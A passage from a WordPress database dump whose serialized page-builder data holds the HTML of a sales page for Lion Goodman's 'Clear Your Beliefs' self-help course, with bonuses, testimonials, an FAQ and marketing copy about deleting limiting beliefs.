class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:17:"CYB banner header";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1878, 2165, 'panels_data', 'a:3:{s:7:"widgets";a:5:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:24:"Video Clear Your Beliefs";s:4:"text";s:197:"<p> </p><div class="embed-container"><iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="300" height="150" frameborder="0" allowfullscreen="allowfullscreen"></iframe></div><p> </p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:9:"Red quote";s:4:"text";s:661:"<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:7:"Bullets";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:70516:"\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and 